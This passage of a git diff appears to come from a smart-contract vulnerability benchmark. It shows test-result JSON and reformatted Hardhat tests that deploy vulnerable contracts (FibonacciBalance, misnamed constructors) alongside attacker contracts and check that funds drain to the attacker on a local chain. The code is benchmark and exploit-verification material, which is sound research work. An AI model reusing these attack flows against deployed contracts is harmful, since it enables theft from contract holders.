funds through reentrancy attack", - "file": "reentrancy/reentrancy_simple_test.js", - "contractFile": "reentrancy/reentrancy_simple.sol", - "state": "passed" - }, - { - "title": "sanity check: reentrancy/simpleDAO.sol", - "file": "reentrancy/simple_dao_test.js", - "contractFile": "reentrancy/simple_dao.sol", - "state": "passed" - }, - { - "title": "should successfully drain funds through reentrancy attack", - "file": "reentrancy/simple_dao_test.js", - "contractFile": "reentrancy/simple_dao.sol", - "state": "passed" - }, - { - "title": "sanity check: time_manipulation/ether_lotto.sol", - "file": "time_manipulation/ether_lotto_test.js", - "contractFile": "time_manipulation/ether_lotto.sol", - "state": "passed" - }, - { - "title": "exploit time manipulation vulnerability", - "file": "time_manipulation/ether_lotto_test.js", - "contractFile": "time_manipulation/ether_lotto.sol", - "state": "passed" - }, - { - "title": "sanity check: time_manipulation/roulette.sol", - "file": "time_manipulation/roulette_test.js", - "contractFile": "time_manipulation/roulette.sol", - "state": "passed" - }, - { - "title": "exploit time manipulation vulnerability", - "file": "time_manipulation/roulette_test.js", - "contractFile": "time_manipulation/roulette.sol", - "state": "passed" - }, - { - "title": "sanity check: time_manipulation/timed_crowdsale.sol", - "file": "time_manipulation/timed_crowdsale_test.js", - "contractFile": "time_manipulation/timed_crowdsale.sol", - "state": "passed" - }, - { - "title": "exploit time manipulation vulnerability", - "file": "time_manipulation/timed_crowdsale_test.js", - "contractFile": "time_manipulation/timed_crowdsale.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e.sol", - "file": "unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e_test.js", - "contractFile": "unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e_test.js", - "contractFile": "unchecked_low_level_calls/0x07f7ecb66d788ab01dc93b9b71a88401de7d0f2e.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2.sol", - "file": "unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2_test.js", - "contractFile": "unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2_test.js", - "contractFile": "unchecked_low_level_calls/0x2972d548497286d18e92b5fa1f8f9139e5653fd2.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa.sol", - "file": "unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa_test.js", - "contractFile": "unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability in WithdrawToken()", - "file": "unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa_test.js", - "contractFile": "unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability in WithdrawToHolder()", - "file": "unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa_test.js", - "contractFile": "unchecked_low_level_calls/0x39cfd754c85023648bf003bea2dd498c5612abfa.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01.sol", - "file": "unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01_test.js", - "contractFile": "unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability in WithdrawToken()", - "file": "unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01_test.js", - "contractFile": "unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability in WithdrawToHolder()", - "file": "unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01_test.js", - "contractFile": "unchecked_low_level_calls/0x3a0e9acd953ffc0dd18d63603488846a6b8b2b01.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3.sol", - "file": "unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3_test.js", - "contractFile": "unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3_test.js", - "contractFile": "unchecked_low_level_calls/0x4051334adc52057aca763453820cb0e045076ef3.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152.sol", - "file": "unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152_test.js", - "contractFile": "unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152_test.js", - "contractFile": "unchecked_low_level_calls/0x4b71ad9c1a84b9b643aa54fdd66e2dec96e8b152.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984.sol", - "file": "unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984_test.js", - "contractFile": "unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984_test.js", - "contractFile": "unchecked_low_level_calls/0x52d2e0f9b01101a59b38a3d05c80b7618aeed984.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol", - "file": "unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839_test.js", - "contractFile": "unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability in WithdrawToken()", - "file": "unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839_test.js", - "contractFile": "unchecked_low_level_calls/0x627fa62ccbb1c1b04ffaecd72a53e37fc0e17839.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol", - "file": "unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_test.js", - "contractFile": "unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability in function withdrawAuctionBalances()", - "file": "unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_test.js", - "contractFile": "unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability in function giveBirth()", - "file": "unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_test.js", - "contractFile": "unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4.sol", - "file": "unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4_test.js", - "contractFile": "unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4_test.js", - "contractFile": "unchecked_low_level_calls/0x7d09edb07d23acb532a82be3da5c17d9d85806b4.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_attack.sol", - "file": "unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_test.js", - "contractFile": "unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability in line 192", - "file": "unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_test.js", - "contractFile": "unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability in line 180", - "file": "unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_test.js", - "contractFile": "unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35.sol", - "file": "unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35_test.js", - "contractFile": "unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability in WithdrawToken()", - "file": "unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35_test.js", - "contractFile": "unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability in WithdrawToHolder()", - "file": "unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35_test.js", - "contractFile": "unchecked_low_level_calls/0x8fd1e427396ddb511533cf9abdbebd0a7e08da35.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431.sol", - "file": "unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431_test.js", - "contractFile": "unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431_test.js", - "contractFile": "unchecked_low_level_calls/0xa1fceeff3acc57d257b917e30c4df661401d6431.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae.sol", - "file": "unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae_test.js", - "contractFile": "unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae_test.js", - "contractFile": "unchecked_low_level_calls/0xa46edd6a9a93feec36576ee5048146870ea2c3ae.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77.sol", - "file": "unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77_test.js", - "contractFile": "unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77_test.js", - "contractFile": "unchecked_low_level_calls/0xb11b2fed6c9354f7aa2f658d3b4d7b31d8a13b77.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7.sol", - "file": "unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7_test.js", - "contractFile": "unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7_test.js", - "contractFile": "unchecked_low_level_calls/0xb7c5c5aa4d42967efe906e1b66cb8df9cebf04f7.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52.sol", - "file": "unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52_test.js", - "contractFile": "unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52_test.js", - "contractFile": "unchecked_low_level_calls/0xbaa3de6504690efb064420d89e871c27065cdd52.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c.sol", - "file": "unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c_test.js", - "contractFile": "unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c_test.js", - "contractFile": "unchecked_low_level_calls/0xbebbfe5b549f5db6e6c78ca97cac19d1fb03082c.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c.sol", - "file": "unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c_test.js", - "contractFile": "unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c_test.js", - "contractFile": "unchecked_low_level_calls/0xd5967fed03e85d1cce44cab284695b41bc675b5c.sol", - "state": "passed" - }, - { - "title": "sanity check: unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220.sol", - "file": "unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220_test.js", - "contractFile": "unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220.sol", - "state": "passed" - }, - { - "title": "exploit unchecked low level call vulnerability", - "file": "unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220_test.js", - "contractFile": "unchecked_low_level_calls/0xe894d54dca59cb53fe9cbc5155093605c7068220.sol", - "state": "passed" - } - ] -} \ No newline at end of file diff --git a/smartbugs-curated/0.4.x/test/access_control/FibonacciBalance_test.js b/smartbugs-curated/0.4.x/test/access_control/FibonacciBalance_test.js index 2fe1b4f..b4d8029 100644 --- a/smartbugs-curated/0.4.x/test/access_control/FibonacciBalance_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/FibonacciBalance_test.js @@ -1,80 +1,100 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/FibonacciBalance.sol', function () { - let amount; - async function deployContracts() { - const [v] = await ethers.getSigners(); +describe("attack access_control/FibonacciBalance.sol", function () { + let amount; + async function deployContracts() { + const [v] = await ethers.getSigners(); - const libPath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/FibonacciBalance.sol/FibonacciLib.json'); - const libJson = JSON.parse(fs.readFileSync(libPath)); + const libPath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/FibonacciBalance.sol/FibonacciLib.json", + ); + const libJson = JSON.parse(fs.readFileSync(libPath)); - const FibonacciLib = await ethers.getContractFactory(libJson.abi, libJson.bytecode, v); - const lib = await FibonacciLib.deploy(); - await lib.waitForDeployment(); - const address = await lib.getAddress(); + const FibonacciLib = await ethers.getContractFactory( + libJson.abi, + libJson.bytecode, + v, + ); + const lib = await FibonacciLib.deploy(); + await lib.waitForDeployment(); + const address = await lib.getAddress(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/FibonacciBalance.sol/FibonacciBalance.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - const FibonacciBalance = await ethers.getContractFactory(json.abi, json.bytecode, v); - amount = ethers.parseEther("1.0"); - const options = { - from: v, - value: amount}; - const victim = await FibonacciBalance.deploy(address, options); - await victim.waitForDeployment(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/FibonacciBalance.sol/FibonacciBalance.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + const FibonacciBalance = await ethers.getContractFactory( + json.abi, + json.bytecode, + v, + ); + amount = ethers.parseEther("1.0"); + const options = { + from: v, + value: amount, + }; + const victim = await FibonacciBalance.deploy(address, options); + await victim.waitForDeployment(); - const FibonacciBalanceAttacker = await ethers.getContractFactory('contracts/access_control/FibonacciBalance_attack.sol:FibonacciBalanceAttacker'); - const attacker = await FibonacciBalanceAttacker.deploy(); - await attacker.waitForDeployment(); - return {lib, victim, attacker}; - } + const FibonacciBalanceAttacker = await ethers.getContractFactory( + "contracts/access_control/FibonacciBalance_attack.sol:FibonacciBalanceAttacker", + ); + const attacker = await FibonacciBalanceAttacker.deploy(); + await attacker.waitForDeployment(); + return { lib, victim, attacker }; + } - it('sanity check: access_control/FibonacciBalance.sol', async function () { - const [v] = await ethers.getSigners(); - const {victim} = await loadFixture(deployContracts); - const fibonacciLibrary = await victim.fibonacciLibrary(); - expect(fibonacciLibrary).to.not.be.empty; - // await expect(victim.withdraw()).to.not.be.reverted; - const abi = ["function setFibonacci(uint n)"]; - const iface = new ethers.Interface(abi); - - const data = iface.encodeFunctionData("setFibonacci", [1]); - await expect(v.sendTransaction({ + it("sanity check: access_control/FibonacciBalance.sol", async function () { + const [v] = await ethers.getSigners(); + const { victim } = await loadFixture(deployContracts); + const fibonacciLibrary = await victim.fibonacciLibrary(); + expect(fibonacciLibrary).to.not.be.empty; + // await expect(victim.withdraw()).to.not.be.reverted; + const abi = ["function setFibonacci(uint n)"]; + const iface = new ethers.Interface(abi); + + const data = iface.encodeFunctionData("setFibonacci", [1]); + await expect( + v.sendTransaction({ to: victim.target, data: data, - })).not.be.reverted; - - }); + }), + ).not.be.reverted; + }); + + it("exploit access control vulnerability", async function () { + const { lib, victim, attacker } = await loadFixture(deployContracts); + const victim_addr = victim.target; - it('exploit access control vulnerability', async function () { - const {lib, victim, attacker} = await loadFixture(deployContracts); - const victim_addr = victim.target; + const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceBefore).to.equal(amount); - const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceBefore).to.equal(amount); + const attacker_address = "0x5C6AF7679A6fCd1eb3E12ea500463ec1D90780B3"; + const attackerBalanceBefore = + await ethers.provider.getBalance(attacker_address); + expect(attackerBalanceBefore).to.equal(0); - const attacker_address = '0x5C6AF7679A6fCd1eb3E12ea500463ec1D90780B3'; - const attackerBalanceBefore = await ethers.provider.getBalance(attacker_address); - expect(attackerBalanceBefore).to.equal(0); + let fibonacciLibrary = await victim.fibonacciLibrary(); + expect(fibonacciLibrary).to.equal(lib.target); - let fibonacciLibrary = await victim.fibonacciLibrary(); - expect(fibonacciLibrary).to.equal(lib.target); - - // attacker changes the FibonacciLibrary address to its own contract address - await attacker.attack(victim_addr); - fibonacciLibrary = await victim.fibonacciLibrary(); - expect(fibonacciLibrary).to.equal(attacker.target); + // attacker changes the FibonacciLibrary address to its own contract address + await attacker.attack(victim_addr); + fibonacciLibrary = await victim.fibonacciLibrary(); + expect(fibonacciLibrary).to.equal(attacker.target); - // victim withdraws the balance - await victim.withdraw(); + // victim withdraws the balance + await victim.withdraw(); - const attackerBalanceAfter = await ethers.provider.getBalance(attacker_address); - expect(attackerBalanceAfter).to.equal(amount); + const attackerBalanceAfter = + await ethers.provider.getBalance(attacker_address); + expect(attackerBalanceAfter).to.equal(amount); - const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceAfter).to.equal(0); - }); - }); \ No newline at end of file + const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceAfter).to.equal(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/arbitrary_location_write_simple_test.js b/smartbugs-curated/0.4.x/test/access_control/arbitrary_location_write_simple_test.js index dca4e93..273ecc9 100644 --- a/smartbugs-curated/0.4.x/test/access_control/arbitrary_location_write_simple_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/arbitrary_location_write_simple_test.js @@ -1,35 +1,39 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/arbitrary_location_write_simple.sol', function () { - async function deployContracts() { - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/arbitrary_location_write_simple.sol/Wallet.json'); - const json = JSON.parse(fs.readFileSync(codePath)); +describe("attack access_control/arbitrary_location_write_simple.sol", function () { + async function deployContracts() { + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/arbitrary_location_write_simple.sol/Wallet.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); - const Wallet = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Wallet.deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); + const Wallet = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await Wallet.deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); - const WalletAttacker = await ethers.getContractFactory('contracts/access_control/arbitrary_location_write_simple_attack.sol:WalletAttacker'); - const attacker = await WalletAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } + const WalletAttacker = await ethers.getContractFactory( + "contracts/access_control/arbitrary_location_write_simple_attack.sol:WalletAttacker", + ); + const attacker = await WalletAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('sanity check: access_control/arbitrary_location_write_simple.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(victim.PushBonusCode(1)).to.not.be.reverted; - await expect(victim.PopBonusCode()).to.not.be.reverted; - }); + it("sanity check: access_control/arbitrary_location_write_simple.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(victim.PushBonusCode(1)).to.not.be.reverted; + await expect(victim.PopBonusCode()).to.not.be.reverted; + }); - - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - await expect(attacker.test()).to.be.reverted; - await attacker.attack(await attacker.getAddress()); - await attacker.test(); - }); - }); \ No newline at end of file + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + await expect(attacker.test()).to.be.reverted; + await attacker.attack(await attacker.getAddress()); + await attacker.test(); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name1_test.js b/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name1_test.js index 1f8b409..a39049c 100644 --- a/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name1_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name1_test.js @@ -1,61 +1,66 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/incorrect_constructor_name1.sol', function () { +describe("attack access_control/incorrect_constructor_name1.sol", function () { let owner; - async function deployContracts() { - [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/incorrect_constructor_name1.sol/Missing.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - - const Missing = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Missing.connect(owner).deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); - - const MissingAttacker = await ethers.getContractFactory('contracts/access_control/incorrect_constructor_name1_attack.sol:MissingAttacker'); - const attacker = await MissingAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } - - it('sanity check: access_control/incorrect_constructor_name1.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(owner.sendTransaction( - {to: victim.target, value: 1} - )).to.not.be.reverted; - }); + async function deployContracts() { + [owner] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/incorrect_constructor_name1.sol/Missing.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + + const Missing = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await Missing.connect(owner).deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); + + const MissingAttacker = await ethers.getContractFactory( + "contracts/access_control/incorrect_constructor_name1_attack.sol:MissingAttacker", + ); + const attacker = await MissingAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await loadFixture(deployContracts); - const victim_addr = await victim.getAddress(); - const attacker_addr = await attacker.getAddress(); - - - const [sig] = await ethers.getSigners(); - const amount = ethers.parseEther("1.0"); - const transactionHash = await sig.sendTransaction({ - to: victim_addr, - value: amount, - }); - - const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceBefore).to.equal(amount); - - - await expect(attacker.test()).to.be.reverted; - - await attacker.attack(); - - const attackerBalanceBefore = await ethers.provider.getBalance(attacker_addr); - await expect(attacker.test()).to.not.be.reverted; - - const attackerBalanceAfter = await ethers.provider.getBalance(await attacker.getAddress()); - expect(attackerBalanceAfter - attackerBalanceBefore).to.equal(amount); - - const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); - expect(victimBalanceAfter).to.equal(0); + it("sanity check: access_control/incorrect_constructor_name1.sol", async function () { + const { victim } = await loadFixture(deployContracts); + await expect(owner.sendTransaction({ to: victim.target, value: 1 })).to.not + .be.reverted; + }); + + it("exploit access control vulnerability", async function () { + const { victim, attacker } = await loadFixture(deployContracts); + const victim_addr = await victim.getAddress(); + const attacker_addr = await attacker.getAddress(); + + const [sig] = await ethers.getSigners(); + const amount = ethers.parseEther("1.0"); + const transactionHash = await sig.sendTransaction({ + to: victim_addr, + value: amount, }); - }); \ No newline at end of file + + const victimBalanceBefore = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceBefore).to.equal(amount); + + await expect(attacker.test()).to.be.reverted; + + await attacker.attack(); + + const attackerBalanceBefore = + await ethers.provider.getBalance(attacker_addr); + await expect(attacker.test()).to.not.be.reverted; + + const attackerBalanceAfter = await ethers.provider.getBalance( + await attacker.getAddress(), + ); + expect(attackerBalanceAfter - attackerBalanceBefore).to.equal(amount); + + const victimBalanceAfter = await ethers.provider.getBalance(victim_addr); + expect(victimBalanceAfter).to.equal(0); + }); +}); diff --git a/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name2_test.js b/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name2_test.js index 32fb979..d4af2ff 100644 --- a/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name2_test.js +++ b/smartbugs-curated/0.4.x/test/access_control/incorrect_constructor_name2_test.js @@ -1,61 +1,66 @@ -const { loadFixture } = require('@nomicfoundation/hardhat-network-helpers'); -const { expect } = require('chai'); +const { loadFixture } = require("@nomicfoundation/hardhat-network-helpers"); +const { expect } = require("chai"); const path = require("path"); const fs = require("fs"); -describe('attack access_control/incorrect_constructor_name2.sol', function () { +describe("attack access_control/incorrect_constructor_name2.sol", function () { let owner; - async function deployContracts() { - [owner] = await ethers.getSigners(); - const codePath = path.join(__dirname, '../../artifacts/contracts/dataset/access_control/incorrect_constructor_name2.sol/Missing.json'); - const json = JSON.parse(fs.readFileSync(codePath)); - - const Missing = await ethers.getContractFactory(json.abi, json.bytecode); - const victim = await Missing.connect(owner).deploy(); - await victim.waitForDeployment(); - const address = await victim.getAddress(); - - const MissingAttacker = await ethers.getContractFactory('contracts/access_control/incorrect_constructor_name2_attack.sol:MissingAttacker'); - const attacker = await MissingAttacker.deploy(address); - await attacker.waitForDeployment(); - return {victim, attacker}; - } - - it('sanity check: access_control/incorrect_constructor_name2.sol', async function () { - const {victim} = await loadFixture(deployContracts); - await expect(owner.sendTransaction( - {to: victim.target, value: 1} - )).to.not.be.reverted; - }); + async function deployContracts() { + [owner] = await ethers.getSigners(); + const codePath = path.join( + __dirname, + "../../artifacts/contracts/dataset/access_control/incorrect_constructor_name2.sol/Missing.json", + ); + const json = JSON.parse(fs.readFileSync(codePath)); + + const Missing = await ethers.getContractFactory(json.abi, json.bytecode); + const victim = await Missing.connect(owner).deploy(); + await victim.waitForDeployment(); + const address = await victim.getAddress(); + + const MissingAttacker = await ethers.getContractFactory( + "contracts/access_control/incorrect_constructor_name2_attack.sol:MissingAttacker", + ); + const attacker = await MissingAttacker.deploy(address); + await attacker.waitForDeployment(); + return { victim, attacker }; + } - it('exploit access control vulnerability', async function () { - const {victim, attacker} = await 